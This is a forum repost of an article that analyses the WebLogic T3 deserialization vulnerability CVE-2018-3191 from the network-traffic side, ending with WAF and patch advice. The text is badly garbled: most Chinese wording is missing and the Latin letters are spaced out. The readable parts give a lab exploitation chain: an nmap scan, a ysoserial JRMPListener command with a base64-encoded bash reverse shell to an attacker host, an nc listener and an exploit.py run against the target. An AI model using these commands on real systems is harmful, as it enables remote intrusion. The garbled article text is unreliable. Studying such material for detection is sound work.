搜索

[13376] 2018-11-04_从流量侧浅谈WebLogic远程代码执行漏洞(CVE-2018-3191)

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2018-11-04_从流量侧浅谈WebLogic远程代码执行漏洞(CVE-2018-3191) W e b L o g i c C V E - 2 0 1 8 - 3 1 9 1 y a o n a g e b a i   F r e e B u f   2 0 1 8 - 1 1 - 0 4 O r a c l e 1 0 ( O r a c l e   C r i t i c a l   P a t c h   U p d a t e   A d v i s o r y   -   O c t o b e r   2 0 1 8 ) T 3 W e b L o g i c C V E - 2 0 1 8 - 3 1 9 1 C V E - 2 0 1 8 - 3 1 9 7 C V E - 2 0 1 8 - 3 2 0 1 C V E - 2 0 1 8 - 3 2 4 5 C V E - 2 0 1 8 - 3 2 5 2 C V S S   3 . 0   B a s e   S c o r e 9 . 8 1 0 . 3 . 6 . 0 ,   1 2 . 1 . 3 . 0 , 1 2 . 2 . 1 . 3 , C V E - 2 0 1 8 - 3 1 9 1 , W e b l o g i c 广 J 2 E E J 2 E E O r a c l e   A p p l i c a t i o n s h t t p s : / / d o c s . o r a c l e . c o m / m i d d l e w a r e / 1 2 2 1 3 / w l s / I N T R O / i n t r o . h t m # I N T R O 1 2 3 T 3 T 3 J A V A : J A V A   R M I ( J a v a   R e m o t e   M e t h o d   I n v o c a t i o n ) , A p p l i c a t i o n R M I 使 使 使 J R M P ( J a v a J a v a   R e m o t e   M e s s a g e P r o t o c o l 使 C O R B A   h t t p s : / / b l o g . c s d n . n e t / c d l 2 0 0 8 s k y / a r t i c l e / d e t a i l s / 6 8 4 4 7 1 9 T 3 W e b l o g i c J a v a   A p p l i c a t i o n R M I J N D I W e b l o g i c T 3 W e b l o g i c J a v a 使
3 . 1   3 . 2   W e b l o g i c W e b l o g i c 使 N m a p W e b l o g i c T 3 C V E - 2 0 1 8 - 3 1 9 1 3 . 3   W e b l o g i c J R M P   L i s t e n e r W e b l o g i c T 3 使 y s o s e r i a l W e b l o g i c h t t p s : / / g i t h u b . c o m / a n g e l w h u / y s o s e r i a l y s o s e r i a l 使 1 9 2 . 1 6 8 . 1 3 7 . 1 3 5   L i n u x     4 . 1 5 . 0 - k a l i 2 - a m d 6 4   # 1   S M P   D e b i a n   4 . 1 5 . 1 1 - 1 k a l i 1   x 8 6 _ 6 4   G N U / L i n u x 1 9 2 . 1 6 8 . 1 3 7 . 1 2 8   L i n u x   u b u n t u   4 . 1 5 . 0 - 3 6 - g e n e r i c   # 3 9 ~ 1 6 . 0 4 . 1 - U b u n t u   S M P     x 8 6 _ 6 4   G N U / L i n u x n m a p   - P n   - s V   1 9 2 . 1 6 8 . 1 3 7 . 1 2 8   - p 7 0 0 1   - - s c r i p t = w e b l o g i c - t 3 - i n f i . n s e j a v a   - c p   y s o s e r i a l - 0 . 0 . 6 - S N A P S H O T - B E T A - a l l . j a r   y s o s e r i a l . e x p l o i t . J R M P L i s t e n e r     p o r t   C o m m o n s C o l l e c t i o n s 1   ' c o m m a n d s '
J R M P L i s t e n e r   J a v a   R e m o t e   M e t h o d   P r o t o c o l J a v a J a v a R M I T C P / I P 线 线 W e b l o g i c b a s h b a s h b a s e 6 4 R u n t i m e . g e t R u n t i m e ( ) . e x e c ( )   J R M P   l i s t e n e r 3 . 4   7 8 9 0 b a s h 3 . 5   E x p l o i t W e b l o g i c r m i j a v a   - c p   y s o s e r i a l - m a s t e r . j a r   y s o s e r i a l . e x p l o i t . J R M P L i s t e n e r   2 3 4 5   C o m m o n s C o l l e c t i o n s 1   ' b a s h   - c   { e c h o , Y m F z a C A t a S A + J i A v Z G V 2 L 3 R j c C 8 x O T I u M T Y 4 L j E z N y 4 x M z U v N z g 5 M C A w P i Y x | { b a s e 6 4 , - d } | { b a s h , - i } ' b a s h   - i   > &   / d e v / t c p / 1 9 2 . 1 6 8 . 1 3 8 . 1 3 5 / 7 8 9 0   0 > & 1 n c   - l v v p   7 8 9 0 p y t h o n   e x p l o i t . p y   1 9 2 . 1 6 8 . 1 3 7 . 1 2 8   7 0 0 1   w e b l o g i c - s p r i n g - j n d i . j a r   1 9 2 . 1 6 8 . 1 3 7 . 1 3 5   2 3 4 5
n c b a s h r o o t C V E - 2 0 1 8 - 3 1 9 1   p a y l o a d h t t p s : / / g i t h u b . c o m / v o i d f y o o / C V E - 2 0 1 8 - 3 1 9 1 / r e l e a s e s W e b l o g i c   T 3 h t t p s : / / g i t h u b . c o m / L i b r a g g b o n d / C V E - 2 0 1 8 - 3 1 9 1 N o . 1 6 T C P 4 . 1   T 3
4 . 2   J t a T r a n s a c t i o n M a n a g e r O r a c l e c o m . b e a . c o r e . r e p a c k a g e d A b s t r a c t P l a t f o r m T r a n s a c t i o n M a n a g e r S p r i n g   J N D I C V E - 2 0 1 8 - 3 1 9 1   P O C 使 J t a T r a n s a c t i o n M a n a g e r S p r i n g   J N D I 4 . 3   p a y l o a d 4 . 4   T 3 J a v a . r m i
w a f W A F T 3 T 3 访 O R A C L E 1 0 C V E - 2 0 1 8 - 3 2 5 2 T 3 访 访 W e b l o g i c b a s e _ d o m a i n " " - > " " W e b l o g i c J D K h t t p s : / / w w w . o r a c l e . c o m / t e c h n e t w o r k / s e c u r i t y - a d v i s o r y / c p u o c t 2 0 1 8 - 4 4 2 8 2 9 6 . h t m l *   W e b F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理